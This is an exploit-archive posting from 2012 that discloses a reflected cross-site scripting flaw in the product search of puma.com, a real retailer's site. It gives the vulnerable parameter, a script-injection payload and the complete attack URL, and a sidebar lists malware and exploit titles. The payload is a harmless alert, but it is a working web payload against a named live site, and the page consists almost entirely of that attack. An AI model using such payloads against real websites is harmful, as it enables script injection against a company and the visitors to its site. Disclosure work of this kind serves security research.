Puma.com Cross Site Scripting

Posted on 30 August 2012

# Exploit Title: Puma.com XSS
# Date: 29.08.2012
# Author: TayfunBasoglu
# Tested: BackTrack 5
# Platform: Php
------------------------------------------------------------------
www.puma.com/running/products?product_search[keyword]=researchXSS

"><script>alert(/TayfunBasoglu/)</script>

www.puma.com/running/products?product_search[keyword]=research"><script>alert(/TayfunBasoglu/)</script>
------------------------------------------------------------------

tayfunbasoglu.blogspot.com
twitter.com/tayfunbasoglu

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Docker Privileged Container Kernel Escape
Systemd Insecure PTY Handling
SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection

Last 20